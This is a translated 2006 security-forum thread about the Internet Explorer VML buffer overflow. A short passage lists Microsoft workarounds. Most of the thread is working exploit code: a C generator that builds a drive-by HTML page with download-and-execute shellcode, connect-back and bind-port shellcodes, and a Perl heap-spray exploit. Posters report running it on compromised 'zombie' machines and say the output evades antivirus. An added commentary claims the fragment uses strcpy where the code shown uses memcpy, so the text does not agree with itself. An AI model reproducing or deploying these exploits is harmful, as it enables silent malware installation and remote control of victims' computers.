
[Original] Another wild horse: Internet Explorer VML Buffer Overflow Download Exec Exploit

Source: Evil Octal Information Security Team (www.eviloctal.com)


We recommend using gyzy's modified version first:
http://forum.eviloctal.com/read-htm-tid-24858.html


A new, critical, unpatched vulnerability was published today!
The vulnerability is in the Windows VML component (used to render vector graphics in IE); no patch is available yet. Attack code has already been released and is very easy to use. The most likely attack is to plant a trojan on a web page: once a user visits the page, the attacker's trojan or virus is installed automatically, without any warning to the user.
In short, for ordinary XP users, here is what to do. There is no patch for this vulnerability yet; until Microsoft releases one, we recommend at least one of the following to protect your system:
1. Unregister vgx.dll: open the "Start" menu, choose "Run", and enter the following command:
regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
Then click "OK", and click "OK" again in the dialog that pops up.
After Microsoft releases a patch, to re-register it, run the following command the same way:
regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
2. Where possible, use a browser that is not based on the IE engine, such as Firefox or Opera.
3. Keep an eye on Microsoft's latest patch bulletins.


Affected systems
Microsoft Windows 2000 Service Pack 4

Microsoft Windows XP Service Pack 1 and Service Pack 2

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1

Microsoft Windows Server 2003 with SP1 for Itanium-based Systems Edition

Microsoft Windows Server 2003 x64 Edition

Workarounds from Microsoft's site
Disable VML support in IE

Microsoft Security Advisory (925568) suggests the following techniques to disable VML support in IE:


Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1
Modify the Access Control List on Vgx.dll to be more restrictive
Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone


Test output:

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>3
Windows VML Download Exec Exploit
Code by nop nop#xsec.org, Welcome to http://www.xsec.org

Usage: 3 <URL> [htmlfile]


C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>3 http://127.0.0.1/test.exe 1.htm
[+] download url:http://127.0.0.1/test.exe
[+] exploit file:1.htm
[+] buff size 287 bytes
[+] exploit write to 1.htm success!

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>

The generated 1.htm is currently not detected by antivirus.

On Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the /GS (Buffer Security Check) flag, making exploitation more difficult.
The exploit is somewhat harder to use on Windows XP SP2, mainly because of the shellcode: some shellcode errors out on Windows XP SP2. Could someone test whether the code below runs on Windows XP SP2? If it does not, the shellcode will need to be changed.

According to the tests by several people below, it is confirmed that this vulnerability is exploitable on 2000.

The code is modified from nop's original; I'll just put this shellcode here on its own.
#define   g_ip      "127.0.0.1"
#define   g_port      1981
// don't change the offsets
#define   ip_offset   92
#define   port_offset   99
//shellcode default connect back to 127.0.0.1:1981
unsigned char sc_connect_back_for_all_ver[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
/* 254 bytes shellcode, xor with 0xee */
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
"\x84\xec\x11\xb8\xfe\x7d\x86\x91\xee\xee\xef\x86\xec\xee\xee\xdb"
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

   port = htons(g_port) ^ (u_short)0xeeee;
   ip = inet_addr(g_ip) ^ 0xeeeeeeee;
   memcpy(&sc_connect_back_for_all_ver[port_offset], &port, 2);
   memcpy(&sc_connect_back_for_all_ver[ip_offset], &ip, 4);
   /* copy with an explicit length: strcpy() stops at the first 0x00 byte, and a
      patched IP or port byte equal to 0xee encodes to 0x00. sc must be declared
      large enough to hold the whole stub. */
   memcpy(sc, sc_connect_back_for_all_ver, sizeof(sc_connect_back_for_all_ver));
Code:
/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Compile : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Note: 0x7Ffa4512 works on Chinese 2k/xp/2k3; 0x7Ffa4512 is recommended
// unless you are specifically testing against 2k

// Search Shellcode
unsigned char dc[] =
"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

// About the shellcode problem people mention below: I'm considering swapping in a different shellcode here.
// A few more shellcodes are given below for testing.
   // shellcode: opens TCP port 8721
/*   "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
   "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
   "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
   "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
   "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
   "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
   "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
   "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
   "\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
   "\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
   "\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
   "\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
   "\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
   "\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
   "\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
   "\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
   "\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
   "\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
   "\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
   "\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
   "\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
   "\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
   "\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
   "\x04\x31\xdb\x53\xff\xd0" */

/* Another one
The length of encoded shellcode is :418
The new Encoded shellcodeD is:

"\xeb\x16\x5a\x4a\x33\xc9\x8b\xc1\x66\xb9\xa2\x1\x66\x8b\xc1\x80"
"\x34\x2\x99\x48\xe2\xf9\xeb\x5\xe8\xe5\xff\xff\xff"

"\x72\x8a\xcf"
"\xaa\x59\xfd\x12\xd9\xa9\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91"
"\xc7\x5a\x72\xfa\xf9\x12\xf5\xbd\xbd\x12\xdc\xa5\x12\xcd\x9c\xe1"
"\x9a\x4c\x12\xd3\x81\x12\xc3\xb9\x9a\x44\x7a\xad\xd0\x12\xad\x12"
"\x9a\x6c\xaa\x66\xaa\x59\x65\x35\x1d\x59\xed\x9e\x58\x5e\x8a\x9a"
"\x61\x72\x6d\xa2\xe5\xbd\xb1\xec\x78\x12\xc3\xbd\x9a\x44\xff\x12"
"\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d\x12\x9a\x5c\x10\xdd\xbd\x85"
"\xf8\x5a\x34\xc9\xcb\x71\x33\x66\x66\x66\x10\x9e\x1a\x5d\x91\x1a"
"\x5e\x9d\xa2\x68\xec\x75\x5a\x72\x98\x55\xcc\x12\x75\x1a\x5d\x45"
"\x72\xcd\xaa\x59\xc9\x66\xcc\x71\x50\x5a\xf1\xed\xed\xe9\xa3\xc5"
"\xc5\xa8\xab\xae\xb7\xa9\xb7\xa9\xb7\xa8\xc5\xa8\xb7\xfc\xe1\xfc"
"\x99\x99\x99\x99\x99\x99\x99\x8b\x99\x9e\x99\xd7\x98\x95\x99\x41"
"\x97\xa4\x99\x81\x96\xa4\x99\xc1\x96\xa4\x17\xd7\x97\x75\x34\x40"
"\x9c\x57\xeb\x67\x2a\x8f\xe7\x41\x7b\xea\xbc\x29\x66\x5b\x74\x42"
"\x75\x61\xaf\x83\xb6\xe9\x72\x9b\x72\x9c\x71\x60\x66\x66\x66\xc7"
"\x18\x77\xcc\x99\x99\x99\x10\xec\x61\x18\x5f\xa9\x99\x99\x99\x71"
"\x92\x66\x66\x66\x12\x49\x14\xe4\x45\x12\x57\x1a\x58\x81\x71\xc6"
"\x66\x66\x66\x1a\x58\x9d\xc8\x21\x98\x98\xf6\xf7\x58\x61\x89\xc9"
"\xf1\xec\xeb\xf5\xf4\xcd\x66\xcc\x45\x12\x49\xc0\xc0\xc0\x71\xa6"
"\x66\x66\x66\xaa\x59\x67\x5d\xb2\x79\x10\xfc\x65\xc9\x66\xec\x65"
"\x66\xcc\x69\x9a\x5d\x12\x61\x21\x3a\x11\xf\x8\x6e\x49\x32\x21"
"\xe\x3\xa\x16\x6e\x49\x32\x21\x57\x50\x48\x3\x6e\x49\x32\xaa"
"\x59\xff\x21\xe1\xfc\x32\xaa\x59\xc9\xc9\x66\xec\x65\x66\xec\x61"
"\xf3\x99\x66\xcc\x6d\x1c\x59\x96\x1c\x8c\x66\x66\x66\xaa\x50\x28"
"\xcd\xb2\x78\x12\x65\xce\xaa\x59\x6a\x33\xc6\x5f\x9e\xdd\xaa\x59"
"\x14\xee\xdd\xcf\xce\xc9\xc9\xc9\xc9\xc9\xc9\x66\xec\x65\xc9\x66"
"\xcc\x7d\x6e\x49\xc9\x66\xaf\x66\xcc\x79\x70\x7a\x67\x66\x66";
*/
//the code is test http://127.0.0.1/1.exe
//Encode=0x99 equal 153(dec)
//Use UrlMode
//The length of new encoded URL shellcode_D is:447 bytes
// The code above comes from a shellcode generator. I don't have time to finish the shellcode-generation code, so a general-purpose program is on hold for now; with a few changes you can write something for your own temporary use. If anyone has time, please write a more polished version.


// The shellcode below is nop's original; some say it has problems, so try swapping in another shellcode
// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
"\xF4\xC1\x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
   int i=0;
   unsigned int ncr = 0;

   for(i=0; i<size; i+=2)
   {
      ncr = (buf[i+1] << 8) + buf[i];

      fprintf(fp, "&#%d;", ncr);
   }
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};
   unsigned char burl[255] = {0};
   int sc_len = 0;
   int psize = 0;
   int i = 0;

   unsigned int nop = 0x4141;
   DWORD jmp = 0xeb06eb06;

   if (argc < 2)
   {
      printf("Windows VML Download Exec Exploit\n");
      printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
      //printf("!!! 0Day !!! Please Keep Private!!!\n");
      printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
      exit(1);
   }

   url = argv[1];
   if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
        10 || strlen(url) > MAXURL)
   {
      printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.\n", MAXURL);
      return;
   }

   printf("[+] download url:%s\n", url);

   if(argc >=3) file = argv[2];

   printf("[+] exploit file:%s\n", file);

   fp = fopen(file, "w+b");
   //fp = fopen(file, "w");
   if(!fp)
   {
      printf("[-] Open file error!\n");
      return;
   }

   // print html header
   fprintf(fp, "%s", header);
   fflush(fp);

   for(i=0; i<NOPSIZE; i++)
   {
      //fprintf(fp, "&#%d;", nop);
      fprintf(fp, "A");
   }

   fflush(fp);

   // print shellcode
   memset(buf, 0x90, sizeof(buf));
   //memset(buf, 0x90, NOPSIZE*2);

   memcpy(buf, &ret, 4);
   psize = 4+8+0x10;

   memcpy(buf+psize, dc, sizeof(dc)-1);
   psize += sizeof(dc)-1;

   memcpy(buf+psize, dcstart, 4);
   psize += 4;

   sc_len = sizeof(sc)-1;
   memcpy(buf+psize, sc, sc_len);
   psize += sc_len;


   // print URL
   memset(burl, 0, sizeof(burl));
   strncpy(burl, url, 60);

   for(i=0; i<strlen(url)+1; i++)
   {
      burl[i] = url[i] ^ 0xee;
   }

   memcpy(buf+psize, burl, strlen(url)+1);
   psize += strlen(url)+1;

   memcpy(buf+psize, dcend, 4);
   psize += 4;


   // print NCR
   convert2ncr(buf, psize);



   printf("[+] buff size %d bytes\n", psize);

   // print html footer
   fprintf(fp, "%s", footer);
   fflush(fp);

   printf("[+] exploit write to %s success!\n", file);
}
Heaven is a place nearby so I won't be so far away and if you try and look for me maybe you'll find me someday
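Added example (my code, not code from the original post or from nop/XSec): a stand-alone C model of what the connect-back patching fragment in this post does. The 21-byte decoder stub XORs the 254-byte body with 0xee at run time, so a value that has to appear in the decoded body is stored pre-XORed at decoder length + body offset (92 for the IP and 99 for the port, as in the fragment). The decoder bytes are the ones from the post; the body is a constructed placeholder (0x90 NOPs encoded with 0xee), not the real payload; htons/inet_addr are assumed to come from arpa/inet.h on POSIX (winsock on Windows).

```c
/* connect_back_patch.c - added example, not from the original post.
 * Models the IP/port patching of nop's XOR-encoded connect-back stub and
 * checks the result by running the decoder's XOR loop in software. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>   /* htons, inet_addr (POSIX; ws2_32 on Windows) */

#define XOR_KEY      0xee
#define DECODER_LEN  21
#define BODY_LEN     254
#define SC_LEN       (DECODER_LEN + BODY_LEN)
#define IP_OFFSET    92      /* 71 + 21, from the post's comments */
#define PORT_OFFSET  99      /* 78 + 21 */

/* The 21-byte decoder from the post: pop ebx; dec ebx; mov cl,0xfe;
 * xor byte [ebx+ecx],0xee; loop. Copied only so the layout matches;
 * nothing here executes it. */
static const uint8_t decoder[DECODER_LEN] = {
    0xeb,0x0e,0x5b,0x4b,0x33,0xc9,0xb1,0xfe,0x80,0x34,0x0b,0xee,
    0xe2,0xfa,0xeb,0x05,0xe8,0xed,0xff,0xff,0xff
};

/* Decoder + constructed placeholder body (0x90 NOPs, encoded). */
void build_stub(uint8_t sc[SC_LEN])
{
    memcpy(sc, decoder, DECODER_LEN);
    memset(sc + DECODER_LEN, 0x90 ^ XOR_KEY, BODY_LEN);
}

/* Same operation as the fragment: network-order port and IP, each XORed
 * with the key, written at the decoder-relative offsets. memcpy, not
 * strcpy, because an encoded byte may legitimately be 0x00. */
void patch_connect_back(uint8_t sc[SC_LEN], const char *ip, uint16_t port)
{
    uint16_t p = htons(port) ^ (uint16_t)0xeeee;
    uint32_t a = inet_addr(ip) ^ 0xeeeeeeeeU;
    memcpy(sc + PORT_OFFSET, &p, sizeof p);
    memcpy(sc + IP_OFFSET, &a, sizeof a);
}

/* Software model of the decoder loop: body[i] ^= 0xee for all 254 bytes. */
void decode_body(const uint8_t sc[SC_LEN], uint8_t body[BODY_LEN])
{
    for (int i = 0; i < BODY_LEN; i++)
        body[i] = sc[DECODER_LEN + i] ^ XOR_KEY;
}

/* 1 if, after patching and decoding, the body holds ip:port in network
 * byte order at body offsets 71 and 78 and nothing else changed. */
int check_connect_back(const char *ip, uint16_t port)
{
    uint8_t sc[SC_LEN], body[BODY_LEN];
    uint16_t want_port = htons(port);
    uint32_t want_ip = inet_addr(ip);
    const int ip_at = IP_OFFSET - DECODER_LEN, port_at = PORT_OFFSET - DECODER_LEN;

    build_stub(sc);
    patch_connect_back(sc, ip, port);
    decode_body(sc, body);

    if (memcmp(sc, decoder, DECODER_LEN) != 0) return 0;
    if (memcmp(body + ip_at, &want_ip, 4) != 0) return 0;
    if (memcmp(body + port_at, &want_port, 2) != 0) return 0;
    for (int i = 0; i < BODY_LEN; i++) {
        int in_ip = i >= ip_at && i < ip_at + 4;
        int in_port = i >= port_at && i < port_at + 2;
        if (!in_ip && !in_port && body[i] != 0x90) return 0;
    }
    return 1;
}

/* Number of 0x00 bytes in the patched, still-encoded stub: any value above
 * zero means strcpy() would truncate it. */
int count_nul_bytes(const char *ip, uint16_t port)
{
    uint8_t sc[SC_LEN];
    int n = 0;
    build_stub(sc);
    patch_connect_back(sc, ip, port);
    for (int i = 0; i < SC_LEN; i++) if (sc[i] == 0) n++;
    return n;
}

int main(void)
{
    printf("127.0.0.1:1981 -> %s, NUL bytes in encoded stub: %d\n",
           check_connect_back("127.0.0.1", 1981) ? "ok" : "FAIL",
           count_nul_bytes("127.0.0.1", 1981));
    /* 238 == 0xee: that byte encodes to 0x00 and would cut strcpy() short */
    printf("10.238.0.1:4444 -> NUL bytes in encoded stub: %d\n",
           count_nul_bytes("10.238.0.1", 4444));
    return 0;
}
```

Build with `cc -o patch connect_back_patch.c`. For the default 127.0.0.1:1981 the encoded stub contains no 0x00 byte, which is the only reason the fragment's strcpy() happens to work; an address or port containing the byte 0xee encodes to 0x00 and is cut short by strcpy(), so copy by length.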


I also generated one,
but when run, IE just closes directly. The trojan didn't run either.
Switching to GreenBrowser, it also closes directly.
On the zombie hosts it closes too.. some zombies show an error.. illegal shutdown.. memory at 100%.
Who else has tested.. share the problems you ran into.

Local test environment: WinXP + IE6.0
Zombie host: win2003 + IE6.0


I tested it.
No success.
IE closed directly.


Quote:
Quoting post #1 by fhod, 2006-09-21 12:52:
I also generated one,
but when run, IE just closes directly. The trojan didn't run either.
His Down&Exec shellcode seems to have a problem; just swap in another one.
Addendum: I mean under Win2000.
http://www.xyzreg.net


//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

Looks like it's aimed at 2000.
I'll find a 2000 zombie to try it on.


Test results:
2000 closed too,
even faster than on XP.
A shellcode problem?


Quote:
Quoting post #6 by fhod, 2006-09-21 13:23:
Test results:
2000 closed too,
even faster than on XP.
A shellcode problem?
Heh, test http://www.xyzreg.net/ievml0day.html on Win2000 and see whether it works~


Quote:
Quoting post #7 by xyzreg, 2006-09-21 13:57:

Heh, test http://www.xyzreg.net/ievml0day.html on Win2000 and see whether it works~
Mine is 2000, and yours worked for me.


Quote:
Quoting post #8 by 优格, 2006-09-21 14:25:

Mine is 2000.
Did it work? You saw the calculator, right? Heh


Test failed on WIN2003! The browser closed directly and nothing appeared.


Under XP SP2!

TT, IE6.0 closed very quickly!


None of the tests succeeded.


In the code comments:
what does "Compile : cl vml.c" mean?


Quote:
Quoting post #11 by ewolfok, 2006-09-21 15:59:
Under XP SP2!

TT, IE6.0 closed very quickly!


.......
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
Both of these are for 2000, right? Is there a jump address for XP SP2?


DWORD ret = 0x7Ffa4512
This one works on Chinese 2k/xp/2k3.


I also came across a piece of Perl code.
I'm not familiar with Perl; I'm just posting the code for a look.
I'm not able to modify it.
Code:
#!/usr/bin/perl
#
# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 +
# Windows 2000 SP4)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
# For educational purpose only
#
# Note: This exploit is modified from Shirkdog's PoC
# (http://www.milw0rm.com/exploits/2400)
#
# I exploit the stack-based buffer overflow in a different manner because of
# the problem with the shellcode. I use the heap spraying technique to inject my
# shellcode into the heap. Because I can control EIP, I tell it to jump into
# the heap that contains the shellcode ^-^
#
# This exploit was tested on: Windows XP SP1 + IE6 SP1
#          Windows XP SP0 + IE6
#          Windows 2000 SP4 + IE6 SP1
#          Windows 2000 SP4 + IE6
#
# I will describe more implementation details on my blog this weekend :)
#
# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
# this exploit does not succeed. The situation where the location that eax
# points to is overwritten does not occur, so I cannot use my technique
# "The Fake Cookie", which I used to break the buffer overflow protection in
# Windows Server 2003 SP0, to bypass it. If anybody can break this protection
# with some technique, please share the information :)
#

use strict;

# win32_bind LPORT = 5555 - Metasploit
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";

my $jscript =
"<script>\n" .
"shellcode = unescape(\"" . convert_shellcode($shellcode) ."\");\n" .
"bigblock = unescape(\"\%u9090\%u9090\");\n" .
"headersize = 20;\n" .
"slackspace = headersize+shellcode.length;\n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;\n" .
"fillblock = bigblock.substring(0, slackspace);\n" .
"block = bigblock.substring(0, bigblock.length-slackspace);\n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n" .
"memory = new Array();\n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;\n" .
"</script>";

my $header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n" .
"<head>\n" .
"<object id=\"VMLRender\" classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\">\n" .
"</object>\n" .
"<style>\n" .
"v\\:* { behavior: url(#VMLRender); }\n" .
"</style>\n" .
"</head>\n" .
$jscript .
"<body>\n" .
"<v:rect style='width:120pt;height:80pt' fillcolor=\"red\">\n" ;

my $footer =
"</v:rect>\n" .
"</body>\n" .
"</html>";


my $body1 = "<v:fill method=\"" ;
my $body2 =
"\" angle=\"-45\"\n" .
"focus=\"100%\" focusposition=\".5,.5\" focussize=\"0,0\"\n" .
"type=\"gradientRadial\" />\n" .
"</v:rect>\n" .
"</body>\n" .
"</html>";

my $page = "\xff\xfe";   # magic number of M$ unicode file
my $c;

# header + body1
foreach $c (split //, ($header . $body1)) {
   $page = $page . $c . "\x00";
}

# padding + ret
$page = $page . "\x41\x00" x (256) . # padding
   "\x01\x0d\x0d\x0d" .   # writable memory
   "\x44\x44\x44\x44" .    # padding
   "\x0d\x0d\x0d\x0d";   # return address

# body2 + footer
foreach $c (split //, ($body2 . $footer)) {
   $page = $page . $c . "\x00";
}

open (IE_VML, ">", "exploit.html");

print IE_VML $page;

close IE_VML;

# This function copy from JSUnescape() code in Metasploit
sub convert_shellcode {
   my $data = shift;
   my $mode = shift() || 'LE';
   my $code = '';
   
   # Encode the shellcode via %u sequences for JS's unescape() function
   my $idx = 0;
   
   # Pad to an even number of bytes
   if (length($data) % 2 != 0) {
      $data .= substr($data, -1, 1);
   }
   
   while ($idx < length($data) - 1) {
      my $c1 = ord(substr($data, $idx, 1));
      my $c2 = ord(substr($data, $idx+1, 1));   
      if ($mode eq 'LE') {
        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);   
      } else {
